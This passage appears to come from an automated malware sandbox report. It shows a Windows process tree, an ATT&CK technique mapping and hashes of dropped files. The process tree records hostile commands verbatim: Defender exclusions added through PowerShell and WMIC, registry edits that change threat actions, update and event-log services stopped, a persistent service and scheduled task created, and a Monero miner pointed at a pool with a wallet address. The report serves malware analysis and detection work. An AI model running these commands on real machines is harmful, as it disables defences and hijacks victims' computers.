                                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                            12⤵
                                                                                              PID:5932
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                13⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                PID:5956
                                                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                  14⤵
                                                                                                    PID:1220
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                            10⤵
                                                                                              PID:5360
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                11⤵
                                                                                                  PID:3848
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                    12⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    PID:4564
                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                      13⤵
                                                                                                        PID:3220
                                                                                            • C:\Users\Admin\Pictures\RfrDiimjyIjFt8m18L8vkv7k.exe
                                                                                              "C:\Users\Admin\Pictures\RfrDiimjyIjFt8m18L8vkv7k.exe"
                                                                                              8⤵
                                                                                                PID:5368
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCBB7.tmp\Install.exe
                                                                                                  .\Install.exe /tEdidDDf "385118" /S
                                                                                                  9⤵
                                                                                                    PID:5780
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                      10⤵
                                                                                                        PID:6040
                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                          11⤵
                                                                                                            PID:5480
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                              12⤵
                                                                                                                PID:5840
                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                  13⤵
                                                                                                                    PID:4180
                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                11⤵
                                                                                                                  PID:3156
                                                                                                          • C:\Users\Admin\Pictures\tDhVAccOvv9AE9DBLdFD9SDD.exe
                                                                                                            "C:\Users\Admin\Pictures\tDhVAccOvv9AE9DBLdFD9SDD.exe"
                                                                                                            8⤵
                                                                                                              PID:5932
                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                                                                            7⤵
                                                                                                              PID:1724
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4804
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
                                                                                                            6⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:3912
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:3532
                                                                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                              7⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:4572
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                              7⤵
                                                                                                                PID:436
                                                                                                                • C:\Windows\system32\wusa.exe
                                                                                                                  wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                  8⤵
                                                                                                                    PID:3700
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                  7⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:1736
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                  7⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:2200
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                  7⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:4236
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  C:\Windows\system32\sc.exe stop bits
                                                                                                                  7⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:2292
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  C:\Windows\system32\sc.exe stop dosvc
                                                                                                                  7⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:2556
                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                  7⤵
                                                                                                                    PID:2300
                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                    7⤵
                                                                                                                      PID:3568
                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                      7⤵
                                                                                                                        PID:3188
                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                        7⤵
                                                                                                                          PID:1404
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe delete "WSNKISKT"
                                                                                                                          7⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:2420
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                                                                                                                          7⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:2788
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe stop eventlog
                                                                                                                          7⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:2144
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe start "WSNKISKT"
                                                                                                                          7⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:2556
                                                                                                                • C:\Users\Admin\1000006002\aef843b44c.exe
                                                                                                                  "C:\Users\Admin\1000006002\aef843b44c.exe"
                                                                                                                  3⤵
                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  PID:2336
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1576 -ip 1576
                                                                                                              1⤵
                                                                                                                PID:2620
                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:2780
                                                                                                                • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                                  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:2408
                                                                                                                  • C:\Windows\Temp\996205.exe
                                                                                                                    "C:\Windows\Temp\996205.exe" --list-devices
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:4268
                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3032
                                                                                                                • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                                  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:1232
                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:2044
                                                                                                                • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                                                  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:4268
                                                                                                                  • C:\Windows\Temp\884020.exe
                                                                                                                    "C:\Windows\Temp\884020.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    PID:2264
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                1⤵
                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Executes dropped EXE
                                                                                                                • Identifies Wine through registry keys
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:4980
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                1⤵
                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Executes dropped EXE
                                                                                                                • Checks whether UAC is enabled
                                                                                                                PID:4896
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5004
                                                                                                              • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                1⤵
                                                                                                                  PID:2108
                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                    2⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:3744
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                    2⤵
                                                                                                                      PID:5844
                                                                                                                      • C:\Windows\system32\wusa.exe
                                                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                        3⤵
                                                                                                                          PID:1480
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                        2⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:5836
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                        2⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:5860
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                        2⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:6048
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop bits
                                                                                                                        2⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:5408
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop dosvc
                                                                                                                        2⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:5572
                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                        2⤵
                                                                                                                          PID:6000
                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                          2⤵
                                                                                                                            PID:5556
                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                            2⤵
                                                                                                                              PID:5272
                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                              2⤵
                                                                                                                                PID:5976
                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                C:\Windows\system32\conhost.exe
                                                                                                                                2⤵
                                                                                                                                  PID:5960
                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                  explorer.exe
                                                                                                                                  2⤵
                                                                                                                                    PID:5752
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:4432
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                    1⤵
                                                                                                                                      PID:2292

                                                                                                                                    Network

                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                    Execution

                                                                                                                                    Command and Scripting Interpreter

                                                                                                                                    1
                                                                                                                                    T1059

                                                                                                                                    PowerShell

                                                                                                                                    1
                                                                                                                                    T1059.001

                                                                                                                                    System Services

                                                                                                                                    2
                                                                                                                                    T1569

                                                                                                                                    Service Execution

                                                                                                                                    2
                                                                                                                                    T1569.002

                                                                                                                                    Scheduled Task/Job

                                                                                                                                    1
                                                                                                                                    T1053

                                                                                                                                    Persistence

                                                                                                                                    Create or Modify System Process

                                                                                                                                    2
                                                                                                                                    T1543

                                                                                                                                    Windows Service

                                                                                                                                    2
                                                                                                                                    T1543.003

                                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                                    1
                                                                                                                                    T1547

                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                    1
                                                                                                                                    T1547.001

                                                                                                                                    Pre-OS Boot

                                                                                                                                    1
                                                                                                                                    T1542

                                                                                                                                    Bootkit

                                                                                                                                    1
                                                                                                                                    T1542.003

                                                                                                                                    Scheduled Task/Job

                                                                                                                                    1
                                                                                                                                    T1053

                                                                                                                                    Privilege Escalation

                                                                                                                                    Abuse Elevation Control Mechanism

                                                                                                                                    1
                                                                                                                                    T1548

                                                                                                                                    Bypass User Account Control

                                                                                                                                    1
                                                                                                                                    T1548.002

                                                                                                                                    Create or Modify System Process

                                                                                                                                    2
                                                                                                                                    T1543

                                                                                                                                    Windows Service

                                                                                                                                    2
                                                                                                                                    T1543.003

                                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                                    1
                                                                                                                                    T1547

                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                    1
                                                                                                                                    T1547.001

                                                                                                                                    Scheduled Task/Job

                                                                                                                                    1
                                                                                                                                    T1053

                                                                                                                                    Defense Evasion

                                                                                                                                    Abuse Elevation Control Mechanism

                                                                                                                                    1
                                                                                                                                    T1548

                                                                                                                                    Bypass User Account Control

                                                                                                                                    1
                                                                                                                                    T1548.002

                                                                                                                                    Impair Defenses

                                                                                                                                    3
                                                                                                                                    T1562

                                                                                                                                    Disable or Modify Tools

                                                                                                                                    2
                                                                                                                                    T1562.001

                                                                                                                                    Modify Registry

                                                                                                                                    4
                                                                                                                                    T1112

                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                    2
                                                                                                                                    T1497

                                                                                                                                    Pre-OS Boot

                                                                                                                                    1
                                                                                                                                    T1542

                                                                                                                                    Bootkit

                                                                                                                                    1
                                                                                                                                    T1542.003

                                                                                                                                    Subvert Trust Controls

                                                                                                                                    1
                                                                                                                                    T1553

                                                                                                                                    Install Root Certificate

                                                                                                                                    1
                                                                                                                                    T1553.004

                                                                                                                                    Credential Access

                                                                                                                                    Unsecured Credentials

                                                                                                                                    3
                                                                                                                                    T1552

                                                                                                                                    Credentials In Files

                                                                                                                                    3
                                                                                                                                    T1552.001

                                                                                                                                    Discovery

                                                                                                                                    Query Registry

                                                                                                                                    5
                                                                                                                                    T1012

                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                    2
                                                                                                                                    T1497

                                                                                                                                    System Information Discovery

                                                                                                                                    4
                                                                                                                                    T1082

                                                                                                                                    Collection

                                                                                                                                    Data from Local System

                                                                                                                                    3
                                                                                                                                    T1005

                                                                                                                                    Command and Control

                                                                                                                                    Web Service

                                                                                                                                    1
                                                                                                                                    T1102

                                                                                                                                    Impact

                                                                                                                                    Service Stop

                                                                                                                                    1
                                                                                                                                    T1489

                                                                                                                                    Replay Monitor

                                                                                                                                    Loading Replay Monitor...

                                                                                                                                    Downloads

                                                                                                                                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                      Filesize

                                                                                                                                      288KB

                                                                                                                                      MD5

                                                                                                                                      d9ec6f3a3b2ac7cd5eef07bd86e3efbc

                                                                                                                                      SHA1

                                                                                                                                      e1908caab6f938404af85a7df0f80f877a4d9ee6

                                                                                                                                      SHA256

                                                                                                                                      472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

                                                                                                                                      SHA512

                                                                                                                                      1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

                                                                                                                                    • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                                                      Filesize

                                                                                                                                      2.5MB

                                                                                                                                      MD5

                                                                                                                                      e6943a08bb91fc3086394c7314be367d

                                                                                                                                      SHA1

                                                                                                                                      451d2e171f906fa6c43f8b901cd41b0283d1fa40

                                                                                                                                      SHA256

                                                                                                                                      aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873

                                                                                                                                      SHA512

                                                                                                                                      505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a

                                                                                                                                    • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                                                                      Filesize

                                                                                                                                      6.2MB

                                                                                                                                      MD5

                                                                                                                                      1bacbebf6b237c75dbe5610d2d9e1812

                                                                                                                                      SHA1

                                                                                                                                      3ca5768a9cf04a2c8e157d91d4a1b118668f5cf1

                                                                                                                                      SHA256

                                                                                                                                      c3747b167c70fd52b16fb93a4f815e7a4ee27cf67d2c7d55ea9d1edc7969c67d

                                                                                                                                      SHA512

                                                                                                                                      f6438eced6915890d5d15d853c3ad6856de949b7354dcea97b1cf40d0c8aed767c8e45730e64ab0368f3606da5e95fd1d4db9cc21e613d517f37ddebbd0fa1fe

                                                                                                                                    • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                                                      Filesize

                                                                                                                                      13.2MB

                                                                                                                                      MD5

                                                                                                                                      72b396a9053dff4d804e07ee1597d5e3

                                                                                                                                      SHA1

                                                                                                                                      5ec4fefa66771613433c17c11545c6161e1552d5

                                                                                                                                      SHA256

                                                                                                                                      d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d

                                                                                                                                      SHA512

                                                                                                                                      ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b

                                                                                                                                    • C:\Program Files (x86)\GameSyncLink\installc.bat
                                                                                                                                      Filesize

                                                                                                                                      301B

                                                                                                                                      MD5

                                                                                                                                      998ab24316795f67c26aca0f1b38c8ce

                                                                                                                                      SHA1

                                                                                                                                      a2a6dc94e08c086fe27f8c08cb8178e7a64f200d

                                                                                                                                      SHA256

                                                                                                                                      a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e

                                                                                                                                      SHA512

                                                                                                                                      7c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75

                                                                                                                                    • C:\Program Files (x86)\GameSyncLink\installg.bat
                                                                                                                                      Filesize

                                                                                                                                      284B

                                                                                                                                      MD5

                                                                                                                                      5dee3cbf941c5dbe36b54690b2a3c240

                                                                                                                                      SHA1

                                                                                                                                      82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

                                                                                                                                      SHA256

                                                                                                                                      98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

                                                                                                                                      SHA512

                                                                                                                                      9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

                                                                                                                                    • C:\Program Files (x86)\GameSyncLink\installm.bat
                                                                                                                                      Filesize

                                                                                                                                      218B

                                                                                                                                      MD5

                                                                                                                                      94b87b86dc338b8f0c4e5869496a8a35

                                                                                                                                      SHA1

                                                                                                                                      2584e6496d048068f61ac72f5c08b54ad08627c3

                                                                                                                                      SHA256

                                                                                                                                      2928d8e9a41f39d3802cfd2900d8edeb107666baa942d9c0ffbfd0234b5e5bfc

                                                                                                                                      SHA512

                                                                                                                                      b67eb73fe51d4dba990789f1e0123e902dac6d26569851c3d51ca0a575221ce317f973999d962669016017d8f81a01f11bd977609e66bb1b244334bce2db5d5d

                                                                                                                                    • C:\ProgramData\mozglue.dll
                                                                                                                                      Filesize

                                                                                                                                      593KB

                                                                                                                                      MD5

                                                                                                                                      c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                      SHA1

                                                                                                                                      95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                      SHA256

                                                                                                                                      ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                      SHA512

                                                                                                                                      fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                    • C:\ProgramData\nss3.dll
                                                                                                                                      Filesize

                                                                                                                                      2.0MB

                                                                                                                                      MD5

                                                                                                                                      1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                      SHA1

                                                                                                                                      6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                      SHA256

                                                                                                                                      ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                      SHA512

                                                                                                                                      dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                    • C:\Users\Admin\1000006002\aef843b44c.exe
                                                                                                                                      Filesize

                                                                                                                                      2.2MB

                                                                                                                                      MD5

                                                                                                                                      477fbbfca9b3ae05bd0facc09f8dabf0

                                                                                                                                      SHA1

                                                                                                                                      d2cf0e99c399562d0717aeda21e5f5ad6518ac16

                                                                                                                                      SHA256

                                                                                                                                      d22e85bf4d5e986bacd2aed7edc11afa0c789a44e36486163c231f02cdf75d04

                                                                                                                                      SHA512

                                                                                                                                      7f9794e9b7a49a3de4173f302779b1c7cbdf3784db9847bac406f431fc7576a1305f6aaf27b8c39396425148c4a12c6bb7498a90ac3f174f415e654734c232e2

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\[email protected]
                                                                                                                                      Filesize

                                                                                                                                      654B

                                                                                                                                      MD5

                                                                                                                                      5cdfc4b9de66db60219b702987b6884f

                                                                                                                                      SHA1

                                                                                                                                      3f664159cd6af48abc3f4c4a2d0ec16ff715b208

                                                                                                                                      SHA256

                                                                                                                                      9a52a5e9dcfcc59699cab7a8777c114d2b9685e68b00502c0bfb28b42ef3321d

                                                                                                                                      SHA512

                                                                                                                                      3c14da8a340736a697b4b2188b1b250b7328278a11e3483cc684247a2c10fc2b69435013e2704275dae319d992a048ff66a074065e91e9a2f65cfbd24a874d1d

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
                                                                                                                                      Filesize

                                                                                                                                      830B

                                                                                                                                      MD5

                                                                                                                                      a483da8b27289fc9cc49d6b17e61cbf6

                                                                                                                                      SHA1

                                                                                                                                      2d4a5a704c2ff332df6436b7bcd16365f03c2a97

                                                                                                                                      SHA256

                                                                                                                                      f7785d4e80691cb2bb59301fe8962e50862c44d8992a0e308f86689b7ee76911

                                                                                                                                      SHA512

                                                                                                                                      e0d061a5ed7c7789d11331b192c0693e9a49398de371153d1d13a8b7a32ae7078ea103b03a535ebd0581f1d9d56bacf77b9e31f68ab1888663111e8d2afea0a9

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
                                                                                                                                      Filesize

                                                                                                                                      2.7MB

                                                                                                                                      MD5

                                                                                                                                      31841361be1f3dc6c2ce7756b490bf0f

                                                                                                                                      SHA1

                                                                                                                                      ff2506641a401ac999f5870769f50b7326f7e4eb

                                                                                                                                      SHA256

                                                                                                                                      222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee

                                                                                                                                      SHA512

                                                                                                                                      53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
                                                                                                                                      Filesize

                                                                                                                                      402KB

                                                                                                                                      MD5

                                                                                                                                      7f981db325bfed412599b12604bd00ab

                                                                                                                                      SHA1

                                                                                                                                      9f8a8fd9df3af3a4111e429b639174229c0c10cd

                                                                                                                                      SHA256

                                                                                                                                      043839a678bed1b10be00842eae413f5ecd1cad7a0eaa384dd80bc1dcd31e69b

                                                                                                                                      SHA512

